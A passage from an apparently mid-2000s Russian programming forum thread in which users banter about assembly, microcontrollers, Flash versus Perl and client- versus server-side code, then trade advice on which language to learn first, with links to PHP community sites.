рыбак рыбака видит издалека (с)...-это насчет выводов...

а асм я знаю уже лет 9 :)
а ты после сдачи курсача кудрявцеву возможно возомнил себя крутым программером...

во-первых, писать софт для МК это плевое дело (это я тебе как человек говорю, который программит контроллеры уже 4 года). тут важнее знать архитектуру не самого камня, а протоколы обмена с внешними устройствами, подключенных к МК )))

во-вторых по "оптимизацией" я не подрузамевал "оптимизацию" кода...па ходу ты даже с классическим программированием не знаком)) слышал ли когда нибудь про динамическое, линейное программирование или о численных методах и т.п.???? - по всей видимости нет :D

RaceWarior
22-12-2005, 01:07
Крсачь я как раз таки пока не сдал:(

О программировании знаю не по наслышке))) Приводить примеры, типа знаю то, это третье и десятое - не буду, дабы не переводить тему в русло "у кого пыска длиннее"... Короче не будем ими мерится, останемся при своих мнениях... ОК?

MpaK999
22-12-2005, 12:17
О, а можно указать, обещаю много рыбы не ловить :D

veterok4
29-12-2005, 11:50
Кодил раньше во флеше...но обламался... Акшен скрипт в некоторых местах несомненно рулит.. всё таки объектно ориентированное программирование... Но нашёл кучу туеву фишек которых флеш не может: сохранение графики... с программным рисование траблы (уровнями), распечатка выделенных областей...и.пр.

Вот теперь засел за перл! О это есть гут!

MpaK999
29-12-2005, 12:55
veterok4

мда, вы сравниваете совершенно разные вещи, серверный и клиентский

водку и покрышку от авто :D

Nihilist
29-12-2005, 13:24
дык ему похоже без разницы, конкретной-то задачи нет, а руки чешутся, при таком подходе получится программист-универсал - все знает, но ничо конкретно сделать не может

MpaK999
29-12-2005, 13:42
оффтоп: хотя я тут подумал, водка все же лучше чем покрышка :)))) :D

Nameless
29-12-2005, 13:50
Ни фига. Покрышку, например, можно пропить. А вот как пропить водку?.. :]]

Neyron
29-12-2005, 13:51
выпить. сдать бутылки и снова пропить).

stab
30-12-2005, 12:41
Эх, любимая фраза Буренина, правда перефразированная...

veterok4
16-01-2006, 21:00
Дилетант! Попробуй на Си++ сделать лёгкий баннер для странички, или мульт без флеша!

veterok4
16-01-2006, 21:07
Да будет вам известно, что во флеше пишуться серверные сценарии. Уже полно сделано во флеше: чатов, игр и т.д. (сервер-клиент). Так что ваш стёб про водку и покрышку не уместен!

Tims
16-01-2006, 21:18
ничего сложного не вижу тут...
а вот ты попробуй создать на сваем гавенном флеше, что-то типа ролика из Assembly (95 и т.д.), с таким же размером, качеством и скоростью... :D

зы: на с++ банеры не пишут, дилетант :D

MpaK999
17-01-2006, 16:47
флэш (Action Script) - выполняется на стороне клиента

Perl, PHP - обычно :))) на стороне сервера

Я указал вам на не корректность сравнения! (срочно бежать за водкой)

veterok4
21-01-2006, 21:00
Вот именно! Поэтому если хочешь сделать полноценную онлайн игруху,например,без связки перл-джава скрипт- флеш ни куда! (а за водкой? мдяя.... без поллитры....нонче ни куда..:)))

MpaK999
21-01-2006, 21:06
это-то тут причем?

можно написать клиента на Java Applet, а серверную да хоть на чем Delphin, C#, Java, Visual Basic и т.п. да хоть на turbo pascal под досом :)))) (о, я крут, знаю много слофф :)))


перечитай себя, ты сравниваешь совершенно разные вещи!!!
именно на это стоит обратить внимание, а не на связки чего-то там с чем-то :))


veterok4
22-01-2006, 01:52
Господа - хорош флудить! Чего мне себя перечитывать? Я всего лишь сказал, что кодил во флеше - а сейчас перлом занялся? Чего вы тут усмотрели такого? Я их и не сравнивал: это и так понятно что немного разные вещи!!!

[HCl] hunter
22-01-2006, 12:27
Может не в тему, но кто с чего (с изучения какого языка программирования) начинал ?
Самоучительствуюсь на РНР - интересно что можно почитать, посмотреть ?

MpaK999
22-01-2006, 15:14
начни с классики C, C++ (паскаль не смотри :)))

по php

http://phpclub.ru
http://dklab.ru
http://livejournal.com/community/ru_php
http://livejournal.com/community/ru_cms
http://livejournal.com/community/ru_coding
http://livejournal.com/community/ru_webdev

veterok4
23-01-2006, 00:43
[QUOTE]Послано MpaK999
[B]начни с классики C, C++ (паскаль не смотри :)))
QUOTE]

Языков много хороших - смотря какие цели перед собой ставишь? А вообще то многие начинали с ... бейсика.. в школе :)

Tims
23-01-2006, 00:56
[QUOTE]Послано veterok4
[B]я начинал с BASIC 48 =)

FL@BeR
23-01-2006, 00:59
Я блин Начинал с ХТМЛ потом на Паскаль перешол иТ. Д. ))

MpaK999
23-01-2006, 14:02
html вообще не язык программирования, так, разметка

MpaK999
23-01-2006, 14:03
не люблю я бейсик, засорение мозга какое-то, синтаксис туп, имхо... для меня лучше классика C (C++), а с него уже легко будет освоить такие как php, java, c# и т.п.

мне кажется этого вполне будет достаточно для неплохого круга задач

Tims
23-01-2006, 14:08
долго смеялсо...